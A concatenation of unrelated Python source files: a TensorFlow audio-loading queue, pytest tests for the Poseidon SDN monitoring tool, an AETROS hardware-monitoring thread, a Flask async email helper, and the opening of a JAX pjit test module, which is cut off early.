def find_files(directory, pattern='*.wav'):
'''Recursively finds all files matching the pattern.'''
files = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
def load_generic_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the directory.'''
files = find_files(directory)
id_reg_exp = re.compile(FILE_PATTERN)
print("files length: {}".format(len(files)))
randomized_files = randomize_files(files)
for filename in randomized_files:
ids = id_reg_exp.findall(filename)
if ids is None:
# The file name does not match the pattern containing ids, so
# there is no id.
category_id = None
else:
# The file name matches the pattern for containing ids.
category_id = None
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
yield audio, filename, category_id
def trim_silence(audio, threshold):
'''Removes silence at the beginning and end of a sample.'''
energy = librosa.feature.rmse(audio)
frames = np.nonzero(energy > threshold)
indices = librosa.core.frames_to_samples(frames)[1]
# Note: indices can be an empty array, if the whole audio was silence.
return audio[indices[0]:indices[-1]] if indices.size else audio[0:0]
def not_all_have_id(files):
''' Return true iff any of the filenames does not conform to the pattern
we require for determining the category id.'''
id_reg_exp = re.compile(FILE_PATTERN)
for file in files:
ids = id_reg_exp.findall(file)
if ids is None:
return True
return False
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self,
audio_dir,
coord,
sample_rate,
gc_enabled,
sample_size,
silence_threshold=None,
queue_size=32):
self.audio_dir = audio_dir
self.sample_rate = sample_rate
self.coord = coord
self.sample_size = sample_size
self.silence_threshold = silence_threshold
self.gc_enabled = gc_enabled
self.threads = []
self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.queue = tf.PaddingFIFOQueue(queue_size,
['float32'],
shapes=[(None, 1)])
self.enqueue = self.queue.enqueue([self.sample_placeholder])
if self.gc_enabled:
self.id_placeholder = tf.placeholder(dtype=tf.int32, shape=())
self.gc_queue = tf.PaddingFIFOQueue(queue_size, ['int32'],
shapes=[()])
self.gc_enqueue = self.gc_queue.enqueue([self.id_placeholder])
# TODO Find a better way to check this.
# Checking inside the AudioReader's thread makes it hard to terminate
# the execution of the script, so we do it in the constructor for now.
files = find_files(audio_dir)
if not files:
raise ValueError("No audio files found in '{}'.".format(audio_dir))
if self.gc_enabled and not_all_have_id(files):
raise ValueError("Global conditioning is enabled, but file names "
"do not conform to pattern having id.")
# Determine the number of mutually-exclusive categories we will
# accomodate in our embedding table.
if self.gc_enabled:
_, self.gc_category_cardinality = get_category_cardinality(files)
# Add one to the largest index to get the number of categories,
# since tf.nn.embedding_lookup expects zero-indexing. This
# means one or more at the bottom correspond to unused entries
# in the embedding lookup table. But that's a small waste of memory
# to keep the code simpler, and preserves correspondance between
# the id one specifies when generating, and the ids in the
# file names.
self.gc_category_cardinality += 1
print("Detected --gc_cardinality={}".format(
self.gc_category_cardinality))
else:
self.gc_category_cardinality = None
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
return output
def dequeue_gc(self, num_elements):
return self.gc_queue.dequeue_many(num_elements)
def thread_main(self, sess):
buffer_ = np.array([])
stop = False
# Go through the dataset multiple times
while not stop:
iterator = load_generic_audio(self.audio_dir, self.sample_rate)
for audio, filename, category_id in iterator:
if self.coord.should_stop():
stop = True
break
if self.silence_threshold is not None:
# Remove silence
audio = trim_silence(audio[:, 0], self.silence_threshold)
audio = audio.reshape(-1, 1)
if audio.size == 0:
print("Warning: {} was ignored as it contains only "
"silence. Consider decreasing trim_silence "
"threshold, or adjust volume of the audio."
.format(filename))
# Cut samples into fixed size pieces
buffer_ = np.append(buffer_, audio)
while len(buffer_) > 0:
piece = np.reshape(buffer_[:self.sample_size], [-1, 1])
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: piece})
buffer_ = buffer_[self.sample_size:]
if self.gc_enabled:
sess.run(self.gc_enqueue,
feed_dict={self.id_placeholder:
category_id})
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True # Thread will close when parent quits.
thread.start()
self.threads.append(thread)
return self.threads
|
test_main.py | # -*- coding: utf-8 -*-
"""
Test module for poseidon.py
Created on 28 June 2016
@author: Charlie Lewis, dgrossman, MShel
"""
import json
import logging
import os
import time
import redis
from prometheus_client import Gauge
from poseidon.constants import NO_DATA
from poseidon.helpers.config import Config
from poseidon.helpers.endpoint import endpoint_factory
from poseidon.main import CTRL_C
from poseidon.main import Monitor
from poseidon.main import rabbit_callback
from poseidon.main import schedule_job_kickurl
from poseidon.main import schedule_job_reinvestigation
from poseidon.main import schedule_thread_worker
from poseidon.main import SDNConnect
logger = logging.getLogger('test')
def test_mirror_endpoint():
controller = Config().get_config()
s = SDNConnect(controller)
endpoint = endpoint_factory('foo')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
s.endpoints[endpoint.name] = endpoint
s.mirror_endpoint(endpoint)
def test_unmirror_endpoint():
controller = Config().get_config()
s = SDNConnect(controller)
endpoint = endpoint_factory('foo')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
s.endpoints[endpoint.name] = endpoint
s.unmirror_endpoint(endpoint)
def test_clear_filters():
controller = Config().get_config()
s = SDNConnect(controller)
endpoint = endpoint_factory('foo')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
s.endpoints[endpoint.name] = endpoint
s.clear_filters()
controller = Config().get_config()
controller['TYPE'] = 'bcf'
s = SDNConnect(controller)
endpoint = endpoint_factory('foo')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
s.endpoints[endpoint.name] = endpoint
s.clear_filters()
def test_check_endpoints():
controller = Config().get_config()
s = SDNConnect(controller)
s.sdnc = None
s.check_endpoints()
def test_endpoint_by_name():
controller = Config().get_config()
s = SDNConnect(controller)
endpoint = s.endpoint_by_name('foo')
assert endpoint == None
endpoint = endpoint_factory('foo')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
s.endpoints[endpoint.name] = endpoint
endpoint2 = s.endpoint_by_name('foo')
assert endpoint == endpoint2
def test_endpoint_by_hash():
controller = Config().get_config()
s = SDNConnect(controller)
endpoint = s.endpoint_by_hash('foo')
assert endpoint == None
endpoint = endpoint_factory('foo')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
s.endpoints[endpoint.name] = endpoint
endpoint2 = s.endpoint_by_hash('foo')
assert endpoint == endpoint2
def test_endpoints_by_ip():
controller = Config().get_config()
s = SDNConnect(controller)
endpoints = s.endpoints_by_ip('10.0.0.1')
assert endpoints == []
endpoint = endpoint_factory('foo')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1', 'ipv4': '10.0.0.1', 'ipv6': 'None'}
s.endpoints[endpoint.name] = endpoint
endpoint2 = s.endpoints_by_ip('10.0.0.1')
assert [endpoint] == endpoint2
def test_endpoints_by_mac():
controller = Config().get_config()
s = SDNConnect(controller)
endpoints = s.endpoints_by_mac('00:00:00:00:00:01')
assert endpoints == []
endpoint = endpoint_factory('foo')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
s.endpoints[endpoint.name] = endpoint
endpoint2 = s.endpoints_by_mac('00:00:00:00:00:00')
assert [endpoint] == endpoint2
def test_signal_handler():
class MockLogger:
def __init__(self):
self.logger = logger
class MockRabbitConnection:
connection_closed = False
def close(self):
self.connection_closed = True
return True
class MockMonitor(Monitor):
def __init__(self):
self.logger = logger
self.controller = Config().get_config()
self.s = SDNConnect(self.controller)
class MockSchedule:
call_log = []
def __init__(self):
self.jobs = ['job1', 'job2', 'job3']
def cancel_job(self, job):
self.call_log.append(job + ' cancelled')
return job + ' cancelled'
mock_monitor = MockMonitor()
mock_monitor.schedule = MockSchedule()
mock_monitor.rabbit_channel_connection_local = MockRabbitConnection()
mock_monitor.logger = MockLogger().logger
# signal handler seem to simply exit and kill all the jobs no matter what
# we pass
mock_monitor.signal_handler(None, None)
assert ['job1 cancelled', 'job2 cancelled',
'job3 cancelled'] == mock_monitor.schedule.call_log
assert True == mock_monitor.rabbit_channel_connection_local.connection_closed
def test_get_q_item():
class MockMQueue:
def get(self, block):
return 'Item'
def task_done(self):
return
CTRL_C['STOP'] = False
class MockMonitor(Monitor):
def __init__(self):
self.logger = logger
self.controller = Config().get_config()
self.s = SDNConnect(self.controller)
mock_monitor = MockMonitor()
mock_monitor.m_queue = MockMQueue()
assert (True, 'Item') == mock_monitor.get_q_item()
CTRL_C['STOP'] = True
mock_monitor.m_queue = MockMQueue()
assert (False, None) == mock_monitor.get_q_item()
def test_update_history():
endpoint = endpoint_factory('foo')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1', 'ipv4': '0.0.0.0', 'ipv6': '1212::1'}
endpoint.metadata = {'mac_addresses': {'00:00:00:00:00:00': {'1551805502': {'labels': ['developer workstation'], 'behavior': 'normal'}}}, 'ipv4_addresses': {
'0.0.0.0': {'os': 'windows'}}, 'ipv6_addresses': {'1212::1': {'os': 'windows'}}}
controller = Config().get_config()
s = SDNConnect(controller)
s.endpoints[endpoint.name] = endpoint
metadata = {123: {'behavior': 'normal'}}
s.update_history(endpoint, {'00:00:00:00:00:00': metadata}, {
'0.0.0.0': metadata}, {'1212::1': metadata})
def test_format_rabbit_message():
CTRL_C['STOP'] = False
class MockLogger:
def __init__(self):
self.logger = logger
class MockMonitor(Monitor):
def __init__(self):
self.fa_rabbit_routing_key = 'foo'
self.logger = logger
self.controller = Config().get_config()
self.s = SDNConnect(self.controller)
self.faucet_event = []
def update_routing_key_time(self, routing_key):
return
mockMonitor = MockMonitor()
mockMonitor.logger = MockLogger().logger
data = dict({'Key1': 'Val1'})
message = ('poseidon.algos.decider', json.dumps(data))
retval, msg_valid = mockMonitor.format_rabbit_message(message)
assert retval == {}
assert msg_valid
message = ('FAUCET.Event', json.dumps(data))
retval, msg_valid = mockMonitor.format_rabbit_message(message)
assert retval == {'Key1': 'Val1'}
assert msg_valid
assert mockMonitor.faucet_event == [{'Key1': 'Val1'}]
message = (None, json.dumps(data))
retval, msg_valid = mockMonitor.format_rabbit_message(message)
assert retval == {}
assert not msg_valid
data = dict({'foo': 'bar'})
message = ('poseidon.action.ignore', json.dumps(data))
retval, msg_valid = mockMonitor.format_rabbit_message(message)
assert retval == {}
assert msg_valid
message = ('poseidon.action.clear.ignored', json.dumps(data))
retval, msg_valid = mockMonitor.format_rabbit_message(message)
assert retval == {}
assert msg_valid
message = ('poseidon.action.remove', json.dumps(data))
retval, msg_valid = mockMonitor.format_rabbit_message(message)
assert retval == {}
assert msg_valid
message = ('poseidon.action.remove.ignored', json.dumps(data))
retval, msg_valid = mockMonitor.format_rabbit_message(message)
assert retval == {}
assert msg_valid
message = ('poseidon.action.remove.inactives', json.dumps(data))
retval, msg_valid = mockMonitor.format_rabbit_message(message)
assert retval == {}
assert msg_valid
ip_data = dict({'10.0.0.1': ['rule1']})
message = ('poseidon.action.update_acls', json.dumps(ip_data))
retval, msg_valid = mockMonitor.format_rabbit_message(message)
assert retval == {}
assert msg_valid
data = [('foo', 'unknown')]
message = ('poseidon.action.change', json.dumps(data))
retval, msg_valid = mockMonitor.format_rabbit_message(message)
assert retval == {}
assert msg_valid
def test_rabbit_callback():
def mock_method(): return True
mock_method.routing_key = 'test_routing_key'
mock_method.delivery_tag = 'test_delivery_tag'
# force mock_method coverage
assert mock_method()
class MockChannel:
def basic_ack(self, delivery_tag): return True
class MockQueue:
item = None
def put(self, item):
self.item = item
return True
# used for testing to verify that we put right stuff there
def get_item(self):
return self.item
mock_channel = MockChannel()
mock_queue = MockQueue()
rabbit_callback(
mock_channel,
mock_method,
'properties',
'body',
mock_queue)
assert mock_queue.get_item() == (mock_method.routing_key, 'body')
rabbit_callback(
mock_channel,
mock_method,
'properties',
'body',
None)
def test_schedule_job_kickurl():
class func():
def __init__(self):
self.logger = logger
self.faucet_event = []
self.controller = Config().get_config()
self.s = SDNConnect(self.controller)
schedule_job_kickurl(func())
def test_schedule_job_reinvestigation():
class func():
def __init__(self):
self.logger = logger
self.faucet_event = []
self.controller = Config().get_config()
self.controller['max_concurrent_reinvestigations'] = 10
self.s = SDNConnect(self.controller)
endpoint = endpoint_factory('foo')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
endpoint.mirror()
endpoint.known()
self.s.endpoints[endpoint.name] = endpoint
endpoint = endpoint_factory('foo2')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
endpoint.mirror()
endpoint.known()
self.s.endpoints[endpoint.name] = endpoint
self.s.store_endpoints()
self.s.get_stored_endpoints()
schedule_job_reinvestigation(func())
def test_find_new_machines():
controller = Config().get_config()
s = SDNConnect(controller)
machines = [{'active': 0, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1', 'port': 1, 'segment': 'switch1', 'ipv4': '123.123.123.123', 'mac': '00:00:00:00:00:00', 'id': 'foo1', 'behavior': 1, 'ipv6': '0'},
{'active': 1, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
'port': 1, 'segment': 'switch1', 'ipv4': '123.123.123.123', 'mac': '00:00:00:00:00:00', 'id': 'foo2', 'behavior': 1, 'ipv6': '0'},
{'active': 0, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
'port': 1, 'segment': 'switch1', 'ipv4': '123.123.123.123', 'mac': '00:00:00:00:00:00', 'id': 'foo3', 'behavior': 1, 'ipv6': '0'},
{'active': 1, 'source': 'poseidon1', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
'port': 2, 'segment': 'switch1', 'ipv4': '2106::1', 'mac': '00:00:00:00:00:00', 'id': 'foo4', 'behavior': 1, 'ipv6': '0'},
{'active': 1, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
'port': 1, 'segment': 'switch1', 'ipv4': '::', 'mac': '00:00:00:00:00:00', 'id': 'foo5', 'behavior': 1, 'ipv6': '0'},
{'active': 1, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
'port': 1, 'segment': 'switch1', 'ipv4': '::', 'mac': '00:00:00:00:00:00', 'id': 'foo6', 'behavior': 1},
{'active': 1, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1', 'port': 1, 'segment': 'switch1', 'ipv6': '::', 'mac': '00:00:00:00:00:00', 'id': 'foo7', 'behavior': 1}]
s.find_new_machines(machines)
def test_Monitor_init():
monitor = Monitor(skip_rabbit=True)
hosts = [{'active': 0, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1', 'port': 1, 'segment': 'switch1', 'ipv4': '123.123.123.123', 'mac': '00:00:00:00:00:00', 'id': 'foo1', 'behavior': 1, 'ipv6': '0'},
{'active': 1, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
'port': 1, 'segment': 'switch1', 'ipv4': '123.123.123.123', 'mac': '00:00:00:00:00:00', 'id': 'foo2', 'behavior': 1, 'ipv6': '0'},
{'active': 0, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
'port': 1, 'segment': 'switch1', 'ipv4': '123.123.123.123', 'mac': '00:00:00:00:00:00', 'id': 'foo3', 'behavior': 1, 'ipv6': '0'},
{'active': 1, 'source': 'poseidon1', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1',
'port': 2, 'segment': 'switch1', 'ipv4': '2106::1', 'mac': '00:00:00:00:00:00', 'id': 'foo4', 'behavior': 1, 'ipv6': '0'},
{'active': 1, 'source': 'poseidon', 'role': 'unknown', 'state': 'unknown', 'ipv4_os': 'unknown', 'tenant': 'vlan1', 'port': 1, 'segment': 'switch1', 'ipv4': '::', 'mac': '00:00:00:00:00:00', 'id': 'foo5', 'behavior': 1, 'ipv6': '0'}]
monitor.prom.update_metrics(hosts)
monitor.update_routing_key_time('foo')
def test_SDNConnect_init():
controller = Config().get_config()
controller['trunk_ports'] = []
s = SDNConnect(controller, first_time=False)
def test_process():
from threading import Thread
def thread1():
global CTRL_C
CTRL_C['STOP'] = False
time.sleep(5)
CTRL_C['STOP'] = True
class MockMonitor(Monitor):
def __init__(self):
self.logger = logger
self.fa_rabbit_routing_key = 'FAUCET.Event'
self.faucet_event = None
self.controller = Config().get_config()
self.s = SDNConnect(self.controller)
self.s.controller['TYPE'] = 'None'
self.s.get_sdn_context()
self.s.controller['TYPE'] = 'bcf'
self.s.get_sdn_context()
self.s.controller['TYPE'] = 'faucet'
self.s.get_sdn_context()
endpoint = endpoint_factory('foo')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
endpoint.mirror()
endpoint.p_prev_states.append(
(endpoint.state, int(time.time())))
self.s.endpoints[endpoint.name] = endpoint
endpoint = endpoint_factory('foo2')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
endpoint.p_next_state = 'mirror'
endpoint.queue()
endpoint.p_prev_states.append(
(endpoint.state, int(time.time())))
self.s.endpoints[endpoint.name] = endpoint
endpoint = endpoint_factory('foo3')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1'}
self.s.endpoints[endpoint.name] = endpoint
self.s.store_endpoints()
self.s.get_stored_endpoints()
def get_q_item(self):
return (True, ('foo', {'data': {}}))
def bad_get_q_item(self):
return (False, ('bar', {'data': {}}))
def format_rabbit_message(self, item):
return ({'data': {}}, False)
mock_monitor = MockMonitor()
t1 = Thread(target=thread1)
t1.start()
mock_monitor.process()
t1.join()
mock_monitor.get_q_item = mock_monitor.bad_get_q_item
t1 = Thread(target=thread1)
t1.start()
mock_monitor.process()
t1.join()
def test_show_endpoints():
endpoint = endpoint_factory('foo')
endpoint.endpoint_data = {
'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1', 'ipv4': '0.0.0.0', 'ipv6': '1212::1'}
endpoint.metadata = {'mac_addresses': {'00:00:00:00:00:00': {'1551805502': {'labels': ['developer workstation'], 'behavior': 'normal'}}}, 'ipv4_addresses': {
'0.0.0.0': {'os': 'windows'}}, 'ipv6_addresses': {'1212::1': {'os': 'windows'}}}
controller = Config().get_config()
s = SDNConnect(controller)
s.endpoints[endpoint.name] = endpoint
s.show_endpoints('all')
s.show_endpoints('state active')
s.show_endpoints('state ignored')
s.show_endpoints('state unknown')
s.show_endpoints('os windows')
s.show_endpoints('role developer-workstation')
s.show_endpoints('behavior normal')
def test_merge_machine():
controller = Config().get_config()
s = SDNConnect(controller)
old_machine = {'tenant': 'foo', 'mac': '00:00:00:00:00:00',
'segment': 'foo', 'port': '1', 'ipv4': '0.0.0.0', 'ipv6': '1212::1'}
new_machine = {'tenant': 'foo', 'mac': '00:00:00:00:00:00',
'segment': 'foo', 'port': '1', 'ipv4': '', 'ipv6': ''}
s.merge_machine_ip(old_machine, new_machine)
assert old_machine['ipv4'] == new_machine['ipv4']
assert new_machine['ipv6'] == new_machine['ipv6']
def test_parse_metadata():
controller = Config().get_config()
s = SDNConnect(controller)
mac_info = {
b'poseidon_hash': 'myhash',
}
ml_info = {
b'labels': b'["foo", "bar"]',
b'confidences': b'[1.0, 2.0]',
'myhash': b'{"pcap_labels": "mylabels", "decisions": {"behavior": "definitely"}}',
}
assert s.parse_metadata(mac_info, ml_info) == {
'behavior': 'None', 'confidences': [1.0, 2.0],
'labels': ['foo', 'bar'], 'pcap_labels': 'mylabels',
'behavior': 'definitely'}
def test_schedule_thread_worker():
from threading import Thread
def thread1():
global CTRL_C
CTRL_C['STOP'] = False
time.sleep(5)
CTRL_C['STOP'] = True
class mockSchedule():
def __init__(self):
pass
def run_pending(self):
pass
class mocksys():
def __init__(self):
pass
sys = mocksys()
t1 = Thread(target=thread1)
t1.start()
try:
schedule_thread_worker(mockSchedule())
except SystemExit:
pass
t1.join()
|
MonitorThread.py | from __future__ import division
from __future__ import absolute_import
import simplejson
import random
import time
import math
import docker
import docker.utils
import docker.errors
import psutil
from threading import Thread
import six
import aetros.cuda_gpu
import numpy as np
class MonitoringThread(Thread):
def __init__(self, job_backend, cpu_cores=1, gpu_devices=None, docker_container=None):
Thread.__init__(self)
self.job_backend = job_backend
self.gpu_devices = gpu_devices
self.docker_container = docker_container
self.max_minutes = 0
self.cpu_cores = cpu_cores
job = self.job_backend.job
if 'maxTime' in job['config'] and isinstance(job['config']['maxTime'], int) and job['config']['maxTime'] > 0:
self.max_minutes = job['config']['maxTime']
self.hardware_stream = self.job_backend.git.stream_file('aetros/job/monitoring.csv')
header = ["second", "cpu", "memory"]
try:
if self.gpu_devices:
for gpu_id, gpu in enumerate(aetros.cuda_gpu.get_ordered_devices()):
if gpu_id in gpu_devices:
header.append("memory_gpu" + str(gpu['id']))
except aetros.cuda_gpu.CudaNotImplementedException: pass
if job_backend.get_job_model().has_dpu():
header += ['dpu0']
self.hardware_stream.write(simplejson.dumps(header)[1:-1] + "\n")
self.running = True
self.early_stopped = False
self.handle_max_time = True
self.client = docker.from_env()
self.docker_api = docker.APIClient(**docker.utils.kwargs_from_env())
self.stat_stream = None
self.docker_last_last_reponse = None
self.docker_last_stream_data = 0
self.docker_last_mem = None
self.docker_last_cpu = None
def stop(self):
self.running = False
def run(self):
def docker_stats_reader(response):
previous_cpu = 0
previous_system = 0
stream = self.docker_api._stream_helper(response)
try:
for line in stream:
data = simplejson.loads(line)
if 'cpu_stats' not in data or not data['cpu_stats']:
return
if 'system_cpu_usage' not in data['cpu_stats']:
return
cpu_util = 0
cpu_delta = data['cpu_stats']['cpu_usage']['total_usage'] - previous_cpu
system_delta = data['cpu_stats']['system_cpu_usage'] - previous_system
previous_cpu = data['cpu_stats']['cpu_usage']['total_usage']
previous_system = data['cpu_stats']['system_cpu_usage']
if cpu_delta > 0 and system_delta > 0:
cpu_cores = len(data['cpu_stats']['cpu_usage']['percpu_usage'])
cpu_util = (cpu_delta / system_delta) * cpu_cores / self.cpu_cores * 100
mem_util = data['memory_stats']['usage'] / data['memory_stats']['limit'] * 100
self.docker_last_stream_data = time.time()
self.docker_last_cpu = min(cpu_util, 100)
self.docker_last_mem = min(mem_util, 100)
except Exception:
return
docker_reader = None
while self.running:
self.handle_early_stop()
self.job_backend.git.store_file('aetros/job/times/elapsed.json', simplejson.dumps(time.time() - self.job_backend.start_time))
if self.job_backend.is_paused:
# when paused, we do not monitor anything, except elapsed.
time.sleep(1)
continue
# always sent network information even when marked as ended. The real end will tear down this thread.
self.network_sync()
if self.job_backend.ended:
# stop hardware monitoring when ended
time.sleep(1)
continue
if self.docker_container:
if docker_reader and self.docker_last_last_reponse and time.time()-self.docker_last_stream_data > 3:
self.docker_last_last_reponse.close()
docker_reader.join()
if not docker_reader or not docker_reader.isAlive():
url = self.docker_api._url("/containers/{0}/stats", self.docker_container)
self.docker_last_last_reponse = self.docker_api._get(url, stream=True)
docker_reader = Thread(target=docker_stats_reader, args=[self.docker_last_last_reponse])
docker_reader.daemon = True
docker_reader.start()
if self.docker_last_cpu is not None:
self.monitor(self.docker_last_cpu, self.docker_last_mem)
time.sleep(1)
else:
cpu_util = np.mean(psutil.cpu_percent(interval=1, percpu=True)) # blocks 1sec
mem_util = psutil.virtual_memory().percent
self.monitor(cpu_util, mem_util) #takes always at least 1sec, no need for sleep
time.sleep(0.01)
# thread requested to end. So queue last network sync update
self.network_sync()
def handle_early_stop(self):
if not self.early_stopped and self.handle_max_time and self.max_minutes > 0:
minutes_run = (time.time() - self.job_backend.start_time) / 60
if minutes_run > self.max_minutes:
self.early_stopped = True
self.job_backend.logger.warning("Max time of "+str(self.max_minutes)+" minutes reached.")
self.job_backend.early_stop()
def network_sync(self):
if self.job_backend.client.write_speeds:
network = {
'ended': self.job_backend.ended,
'channels': {},
'messages': 0,
'files': {},
'git': [],
'sent': self.job_backend.client.bytes_sent,
'total': self.job_backend.client.bytes_total,
'speed': self.job_backend.client.bytes_speed,
}
for channel, messages in six.iteritems(self.job_backend.client.queues):
messages = messages[:]
for message in messages:
if 'type' not in message:
continue
if message['type'] == 'store-blob' and message['path'] in ['aetros/job/network.json']:
continue
if message['type'] == 'git-unpack-objects':
bytes_sent = message['_bytes_sent']
total = message['_total']
network['git'].append({
'sent': bytes_sent,
'total': total,
'objects': message['objects']
})
network['messages'] += 1
if message['type'] == 'store-blob':
if message['path'].startswith('aetros/job/times'):
continue
bytes_sent = message['_bytes_sent']
total = message['_total']
network['files'][message['path']] = {
'sent': bytes_sent,
'total': total,
}
network['messages'] += 1
data = simplejson.dumps(network)
self.job_backend.client.send({'type': 'store-blob', 'path': 'aetros/job/network.json', 'data': data}, channel='')
def monitor(self, cpu_util, mem_util):
x = math.ceil(time.time()-self.job_backend.start_time)
row = [x, cpu_util, mem_util]
try:
if self.gpu_devices:
for gpu_id, gpu in enumerate(aetros.cuda_gpu.get_ordered_devices()):
if gpu_id not in self.gpu_devices:
continue
gpu_memory_use = None
info = aetros.cuda_gpu.get_memory(gpu['device'])
if info is not None:
free, total = info
gpu_memory_use = (total-free) / total*100
row.append(gpu_memory_use)
except aetros.cuda_gpu.CudaNotImplementedException: pass
if self.job_backend.get_job_model().has_dpu():
row += [25 + random.randint(-10, 20)]
self.hardware_stream.write(simplejson.dumps(row)[1:-1] + "\n")
|
emails.py | # -*- coding: utf-8 -*-
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from flaskholo.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(to, subject, template, **kwargs):
message = Message(current_app.config['FLASKHOLO_MAIL_SUBJECT_PREFIX'] + subject, recipients=[to])
message.body = render_template(template + '.txt', **kwargs)
message.html = render_template(template + '.html', **kwargs)
app = current_app._get_current_object()
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_confirm_email(user, token, to=None):
send_mail(subject='Email Confirm', to=to or user.email, template='emails/confirm', user=user, token=token)
def send_reset_password_email(user, token):
send_mail(subject='Password Reset', to=user.email, template='emails/reset_password', user=user, token=token)
def send_change_email_email(user, token, to=None):
send_mail(subject='Change Email Confirm', to=to or user.email, template='emails/change_email', user=user, token=token)
|
pjit_test.py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from functools import partial
import logging
import threading
import unittest
from collections import OrderedDict, namedtuple
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import jax
import jax.numpy as jnp
from jax._src import test_util as jtu
from jax.errors import JAXTypeError
from jax import lax
# TODO(skye): do we still wanna call this PartitionSpec?
from jax.experimental import PartitionSpec as P
from jax.experimental.maps import xmap, mesh, Mesh
from jax.experimental import global_device_array
import jax.experimental.pjit as pjit_lib
from jax.experimental.pjit import (pjit, pjit_p, with_sharding_constraint,
SpecSync, FROM_GDA)
from jax.interpreters import pxla
from jax.interpreters import xla
from jax._src.lib import xla_client
from jax._src.util import prod, curry, unzip2, safe_zip
from jax.config import config
config.parse_flags_with_absl()
def setUpModule():
if jax.default_backend() not in {'gpu', 'tpu'}:
raise unittest.SkipTest("pjit only supports GPU and TPU backends")
jtu.set_spmd_lowering_flag(True)
def tearDownModule():
jtu.restore_spmd_lowering_flag()
def create_gda(global_shape, global_mesh, mesh_axes):
global_data = np.arange(
prod(global_shape), dtype=np.float32).reshape(global_shape)
return global_device_array.GlobalDeviceArray.from_callback(
global_shape, global_mesh, mesh_axes, lambda idx: global_data[idx])
@curry
def check_1d_2d_mesh(f, set_mesh):
return parameterized.named_parameters(
{"testcase_name": "_" + name, "mesh": mesh, "resources": resources}
for name, mesh, resources in (
("2", (("x", 2),), "x"),
("2x1", (("x", 2), ("y", 1)), ("x", "y")),
("2x2", (("x", 2), ("y", 2)), ("x", "y")),
))(jtu.with_mesh_from_kwargs(f) if set_mesh else f)
def create_global_mesh(mesh_shape, axis_names):
size = prod(mesh_shape)
if len(jax.devices()) < size:
raise unittest.SkipTest(f"Test requires {size} local devices")
mesh_devices = np.array(jax.devices()[:size]).reshape(mesh_shape)
global_mesh = Mesh(mesh_devices, axis_names)
return global_mesh
# TODO(skye): make the buffer donation utils part of JaxTestCase
class PJitTest(jtu.BufferDonationTestCase):
@jtu.with_mesh([('x', 1)])
def testDeviceBufferAval(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=P('x'))
def f(x):
